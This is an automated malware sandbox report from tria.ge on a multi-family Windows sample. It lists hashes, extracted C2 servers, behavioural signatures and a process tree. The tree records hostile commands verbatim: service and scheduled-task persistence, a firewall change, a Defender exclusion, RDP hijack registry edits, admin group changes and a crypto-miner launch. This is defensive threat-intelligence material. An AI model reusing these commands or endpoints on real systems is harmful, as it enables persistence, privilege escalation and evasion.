Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    13/10/2021, 17:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a696732e2e35fe313aedd7e1652e99387c3c0e828609346e2d44ca3472c41c73.exe

  • Size

    311KB

  • MD5

    71b2719574e8cc8a2b2eeb000362835d

  • SHA1

    104e5c3e041fe8ddb0920808be1c0df14a8ce799

  • SHA256

    a696732e2e35fe313aedd7e1652e99387c3c0e828609346e2d44ca3472c41c73

  • SHA512

    51e50b65ec48833fcda448a3388921818d9478de12d5fd7ed15cd9ce6a0d4937014f57d795a95e4eb6b6c5040eeabb9731ff6c44f68f8ba6b0ded66bad9ef755

Score
10/10
arkeiraccoonredlineservhelpersmokeloadertofseexmrig@nastya_erofbe5e97e7d069407605ee9138022aa82166657e6megaproliv2w1backdoordiscoveryevasioninfostealerminerpersistencespywarestealerthemidatrojanvmprotect

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://honawey7.xyz/

http://wijibui0.xyz/

http://hefahei6.xyz/

http://pipevai4.xyz/

http://nalirou7.xyz/

http://xacokuo8.xyz/

http://hajezey1.xyz/

http://gejajoo7.xyz/

http://sysaheu9.xyz/

http://rixoxeu9.xyz/
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Extracted

Family

redline

Botnet

w1

C2

109.234.34.165:12323

Extracted

Family

raccoon

Version

1.8.2

Botnet

fbe5e97e7d069407605ee9138022aa82166657e6

Attributes
  • url4cnc

    http://telemirror.top/stevuitreen

    http://tgmirror.top/stevuitreen

    http://telegatt.top/stevuitreen

    http://telegka.top/stevuitreen

    http://telegin.top/stevuitreen

    https://t.me/stevuitreen

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

MegaProliv2

C2

93.115.20.139:28978

Extracted

Family

redline

Botnet

@Nastya_ero

C2

45.14.49.66:21899

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

    stealerarkei
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 8 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Turns off Windows Defender SpyNet reporting 2 TTPs
    evasion
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Arkei Stealer Payload 1 IoCs
    stealer
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Nirsoft 3 IoCs
  • XMRig Miner Payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • Sets service image path in registry 2 TTPs
    persistence
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Windows security modification 2 TTPs 10 IoCs
    evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
    evasiontrojan
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a696732e2e35fe313aedd7e1652e99387c3c0e828609346e2d44ca3472c41c73.exe
    "C:\Users\Admin\AppData\Local\Temp\a696732e2e35fe313aedd7e1652e99387c3c0e828609346e2d44ca3472c41c73.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4068
    • C:\Users\Admin\AppData\Local\Temp\a696732e2e35fe313aedd7e1652e99387c3c0e828609346e2d44ca3472c41c73.exe
      "C:\Users\Admin\AppData\Local\Temp\a696732e2e35fe313aedd7e1652e99387c3c0e828609346e2d44ca3472c41c73.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:4184
  • C:\Users\Admin\AppData\Local\Temp\F9F1.exe
    C:\Users\Admin\AppData\Local\Temp\F9F1.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:404
    • C:\Users\Admin\AppData\Local\Temp\F9F1.exe
      C:\Users\Admin\AppData\Local\Temp\F9F1.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3720
  • C:\Users\Admin\AppData\Local\Temp\397.exe
    C:\Users\Admin\AppData\Local\Temp\397.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xseynmtv\
      2⤵
        PID:1200
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ydndrw.exe" C:\Windows\SysWOW64\xseynmtv\
        2⤵
          PID:1588
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create xseynmtv binPath= "C:\Windows\SysWOW64\xseynmtv\ydndrw.exe /d\"C:\Users\Admin\AppData\Local\Temp\397.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1896
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description xseynmtv "wifi internet conection"
            2⤵
              PID:2384
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start xseynmtv
              2⤵
                PID:3040
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:4144
              • C:\Users\Admin\AppData\Local\Temp\86A.exe
                C:\Users\Admin\AppData\Local\Temp\86A.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:4272
              • C:\Users\Admin\AppData\Local\Temp\FCE.exe
                C:\Users\Admin\AppData\Local\Temp\FCE.exe
                1⤵
                • Executes dropped EXE
                PID:1256
              • C:\Users\Admin\AppData\Local\Temp\17DD.exe
                C:\Users\Admin\AppData\Local\Temp\17DD.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2708
              • C:\Windows\SysWOW64\xseynmtv\ydndrw.exe
                C:\Windows\SysWOW64\xseynmtv\ydndrw.exe /d"C:\Users\Admin\AppData\Local\Temp\397.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4156
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:1376
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1700
              • C:\Users\Admin\AppData\Local\Temp\2943.exe
                C:\Users\Admin\AppData\Local\Temp\2943.exe
                1⤵
                • Executes dropped EXE
                PID:2200
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                  2⤵
                  • Drops file in System32 directory
                  • Drops file in Windows directory
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3136
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4g4pkl1o\4g4pkl1o.cmdline"
                    3⤵
                      PID:1816
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F5D.tmp" "c:\Users\Admin\AppData\Local\Temp\4g4pkl1o\CSCAFC07B3F35254A1F9F20C2FB645CDA22.TMP"
                        4⤵
                          PID:4500
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                        3⤵
                          PID:3644
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                          3⤵
                            PID:3568
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                            3⤵
                              PID:1544
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                              3⤵
                                PID:4824
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                3⤵
                                • Modifies registry key
                                PID:5096
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                3⤵
                                  PID:3608
                                • C:\Windows\SysWOW64\net.exe
                                  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                  3⤵
                                    PID:1152
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                      4⤵
                                        PID:660
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                      3⤵
                                        PID:2964
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start rdpdr
                                          4⤵
                                            PID:3000
                                            • C:\Windows\SysWOW64\net.exe
                                              net start rdpdr
                                              5⤵
                                                PID:5060
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start rdpdr
                                                  6⤵
                                                    PID:644
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                              3⤵
                                                PID:4140
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c net start TermService
                                                  4⤵
                                                    PID:2092
                                                    • C:\Windows\SysWOW64\net.exe
                                                      net start TermService
                                                      5⤵
                                                        PID:1268
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 start TermService
                                                          6⤵
                                                            PID:4884
                                                • C:\Users\Admin\AppData\Local\Temp\2DA9.exe
                                                  C:\Users\Admin\AppData\Local\Temp\2DA9.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3752
                                                  • C:\Users\Admin\AppData\Local\Temp\2DA9.exe
                                                    C:\Users\Admin\AppData\Local\Temp\2DA9.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4944
                                                • C:\Users\Admin\AppData\Local\Temp\36B3.exe
                                                  C:\Users\Admin\AppData\Local\Temp\36B3.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:4540
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 344
                                                    2⤵
                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                    • Program crash
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1112
                                                • C:\Users\Admin\AppData\Local\Temp\3CFD.exe
                                                  C:\Users\Admin\AppData\Local\Temp\3CFD.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4792
                                                • C:\Users\Admin\AppData\Local\Temp\4684.exe
                                                  C:\Users\Admin\AppData\Local\Temp\4684.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:1796
                                                  • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:2184
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                      3⤵
                                                        PID:3996
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
                                                          4⤵
                                                            PID:1624
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
                                                          3⤵
                                                          • Creates scheduled task(s)
                                                          PID:756
                                                    • C:\Users\Admin\AppData\Local\Temp\4CDE.exe
                                                      C:\Users\Admin\AppData\Local\Temp\4CDE.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Windows security modification
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3204
                                                      • C:\Users\Admin\AppData\Local\Temp\46df1a1f-0384-4b82-94da-a01c7d4b1035\AdvancedRun.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\46df1a1f-0384-4b82-94da-a01c7d4b1035\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\46df1a1f-0384-4b82-94da-a01c7d4b1035\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4404
                                                        • C:\Users\Admin\AppData\Local\Temp\46df1a1f-0384-4b82-94da-a01c7d4b1035\AdvancedRun.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\46df1a1f-0384-4b82-94da-a01c7d4b1035\AdvancedRun.exe" /SpecialRun 4101d8 4404
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1264
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\4CDE.exe" -Force
                                                        2⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1196
                                                      • C:\Users\Admin\AppData\Local\Temp\4CDE.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\4CDE.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:2240
                                                      • C:\Users\Admin\AppData\Local\Temp\4CDE.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\4CDE.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:68
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 2260
                                                        2⤵
                                                        • Program crash
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4292
                                                    • C:\Users\Admin\AppData\Local\Temp\52AB.exe
                                                      C:\Users\Admin\AppData\Local\Temp\52AB.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:2116
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                        2⤵
                                                          PID:2124
                                                      • C:\Users\Admin\AppData\Local\Temp\7150.exe
                                                        C:\Users\Admin\AppData\Local\Temp\7150.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        PID:1824
                                                        • C:\Users\Admin\AppData\Local\Temp\1_1.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\1_1.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:4604
                                                        • C:\Users\Admin\AppData\Local\Temp\ins.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\ins.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Identifies Wine through registry keys
                                                          • Loads dropped DLL
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:2812
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 1436
                                                            3⤵
                                                            • Program crash
                                                            PID:5052
                                                      • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                        C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                        1⤵
                                                        • Executes dropped EXE
                                                        PID:812

                                                      Network

                                                      MITRE ATT&CK Enterprise v6

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • memory/68-347-0x0000000005760000-0x0000000005D66000-memory.dmp

                                                        Filesize

                                                        6.0MB

                                                        Download

                                                      • memory/404-127-0x0000000001720000-0x000000000186A000-memory.dmp

                                                        Filesize

                                                        1.3MB

                                                        Download

                                                      • memory/404-123-0x00000000018D6000-0x00000000018E7000-memory.dmp

                                                        Filesize

                                                        68KB

                                                        Download

                                                      • memory/1196-427-0x000000007EEA0000-0x000000007EEA1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1196-335-0x0000000006AF0000-0x0000000006AF1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1196-337-0x0000000006AF2000-0x0000000006AF3000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1196-452-0x0000000006AF3000-0x0000000006AF4000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1256-153-0x00000000019C6000-0x0000000001A15000-memory.dmp

                                                        Filesize

                                                        316KB

                                                        Download

                                                      • memory/1256-183-0x0000000000400000-0x00000000016FF000-memory.dmp

                                                        Filesize

                                                        19.0MB

                                                        Download

                                                      • memory/1256-175-0x0000000003350000-0x00000000033DE000-memory.dmp

                                                        Filesize

                                                        568KB

                                                        Download

                                                      • memory/1376-188-0x0000000000B90000-0x0000000000B91000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1376-186-0x0000000000E80000-0x0000000000E95000-memory.dmp

                                                        Filesize

                                                        84KB

                                                        Download

                                                      • memory/1376-190-0x0000000000B90000-0x0000000000B91000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1544-998-0x0000000007230000-0x0000000007231000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/1544-1000-0x0000000007232000-0x0000000007233000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2124-409-0x0000000005350000-0x000000000584E000-memory.dmp

                                                        Filesize

                                                        5.0MB

                                                        Download

                                                      • memory/2200-243-0x0000000000400000-0x0000000000841000-memory.dmp

                                                        Filesize

                                                        4.3MB

                                                        Download

                                                      • memory/2200-235-0x00000000058F0000-0x0000000005CEF000-memory.dmp

                                                        Filesize

                                                        4.0MB

                                                        Download

                                                      • memory/2200-253-0x00000000054D3000-0x00000000054D4000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2200-255-0x00000000054D4000-0x00000000054D5000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2200-193-0x0000000000AF0000-0x0000000000EF6000-memory.dmp

                                                        Filesize

                                                        4.0MB

                                                        Download

                                                      • memory/2200-246-0x00000000054D0000-0x00000000054D1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2200-251-0x00000000054D2000-0x00000000054D3000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2200-241-0x00000000063B0000-0x00000000063B1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2200-242-0x0000000000F00000-0x0000000001302000-memory.dmp

                                                        Filesize

                                                        4.0MB

                                                        Download

                                                      • memory/2708-177-0x00000000051C2000-0x00000000051C3000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2708-162-0x0000000000A60000-0x0000000000A91000-memory.dmp

                                                        Filesize

                                                        196KB

                                                        Download

                                                      • memory/2708-174-0x00000000051C0000-0x00000000051C1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2708-181-0x00000000051C4000-0x00000000051C5000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2708-179-0x00000000051C3000-0x00000000051C4000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2708-168-0x0000000002850000-0x000000000286C000-memory.dmp

                                                        Filesize

                                                        112KB

                                                        Download

                                                      • memory/2716-143-0x0000000003290000-0x00000000032A3000-memory.dmp

                                                        Filesize

                                                        76KB

                                                        Download

                                                      • memory/2716-145-0x0000000000400000-0x00000000016C0000-memory.dmp

                                                        Filesize

                                                        18.8MB

                                                        Download

                                                      • memory/2812-380-0x00000000022B0000-0x00000000022B1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/2812-363-0x0000000077790000-0x000000007791E000-memory.dmp

                                                        Filesize

                                                        1.6MB

                                                        Download

                                                      • memory/2812-376-0x0000000000400000-0x000000000071C000-memory.dmp

                                                        Filesize

                                                        3.1MB

                                                        Download

                                                      • memory/3028-158-0x0000000002A00000-0x0000000002A16000-memory.dmp

                                                        Filesize

                                                        88KB

                                                        Download

                                                      • memory/3028-119-0x0000000000850000-0x0000000000866000-memory.dmp

                                                        Filesize

                                                        88KB

                                                        Download

                                                      • memory/3136-403-0x00000000046C3000-0x00000000046C4000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3136-305-0x00000000046C2000-0x00000000046C3000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3136-303-0x00000000046C0000-0x00000000046C1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3204-277-0x0000000005170000-0x0000000005171000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3568-968-0x0000000005360000-0x0000000005361000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3568-969-0x0000000005362000-0x0000000005363000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3644-510-0x00000000070F0000-0x00000000070F1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3644-719-0x000000007F170000-0x000000007F171000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3644-512-0x00000000070F2000-0x00000000070F3000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3752-199-0x0000000004B90000-0x0000000004B91000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3752-203-0x0000000004D00000-0x0000000004D01000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3752-201-0x0000000005210000-0x0000000005211000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3752-200-0x0000000004B30000-0x0000000004B31000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/3752-197-0x0000000000340000-0x0000000000341000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4068-115-0x0000000001966000-0x0000000001976000-memory.dmp

                                                        Filesize

                                                        64KB

                                                        Download

                                                      • memory/4068-116-0x00000000016C0000-0x000000000176E000-memory.dmp

                                                        Filesize

                                                        696KB

                                                        Download

                                                      • memory/4156-185-0x0000000000400000-0x00000000016C0000-memory.dmp

                                                        Filesize

                                                        18.8MB

                                                        Download

                                                      • memory/4156-184-0x00000000016C0000-0x000000000176E000-memory.dmp

                                                        Filesize

                                                        696KB

                                                        Download

                                                      • memory/4184-117-0x0000000000400000-0x0000000000409000-memory.dmp

                                                        Filesize

                                                        36KB

                                                        Download

                                                      • memory/4272-216-0x0000000008240000-0x0000000008241000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-148-0x0000000005D50000-0x0000000005D51000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-146-0x0000000005900000-0x0000000005901000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-144-0x0000000005950000-0x0000000005951000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-137-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-141-0x0000000005A70000-0x0000000005A71000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-152-0x0000000005990000-0x0000000005991000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-140-0x00000000058A0000-0x00000000058A1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-139-0x0000000005F70000-0x0000000005F71000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-210-0x0000000007630000-0x0000000007631000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-227-0x00000000081E0000-0x00000000081E1000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4272-142-0x0000000077790000-0x000000007791E000-memory.dmp

                                                        Filesize

                                                        1.6MB

                                                        Download

                                                      • memory/4272-204-0x0000000007270000-0x0000000007271000-memory.dmp

                                                        Filesize

                                                        4KB

                                                        Download

                                                      • memory/4540-211-0x0000000000750000-0x0000000000781000-memory.dmp

                                                        Filesize

                                                        196KB

                                                        Download

